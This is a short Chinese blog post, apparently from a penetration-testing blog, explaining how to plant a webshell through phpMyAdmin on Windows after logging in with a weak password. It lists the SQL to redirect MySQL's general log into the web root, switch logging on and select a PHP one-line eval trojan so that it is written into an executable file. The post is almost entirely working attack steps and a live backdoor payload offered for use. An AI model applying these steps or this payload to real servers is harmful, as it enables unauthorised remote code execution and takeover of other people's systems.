不知网页目录的情况下使用PHPMYADMIN获取WEBSHELL(Windows)
简介
很多情况下,我们扫描目标网页后得知phpmyadmin存在。 在使用弱口令登陆成功的情况下,我们即可使用该方法获得webshell。
方法
默认状况下,PHP关闭了日志记录,使用下述方法即可查看是否开启记录,也能查看记录日志的位置。
1 | show variables like'general%'; |
使用以下SQL语句,即可规定日志的存放路径(针对windows环境,PHPTutorial路径下存在WWW)。
1 | SET global general_log_file='D:/phpStudy/PHPTutorial/WWW/xxx/xxx.xxx'; |
之后便可开启日志记录功能。
1 | set global general_log = "ON"; |
执行selcet语句,在上述日志文件内记录下一句话木马。
1 | select '<?php eval($_POST[yumu]);?>' |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 龟's Blog!
![[HTB]10.10.10.212-Bucket](https://oss.mattshi.com/img/posts/HackTheBox/bucket/infocard.png)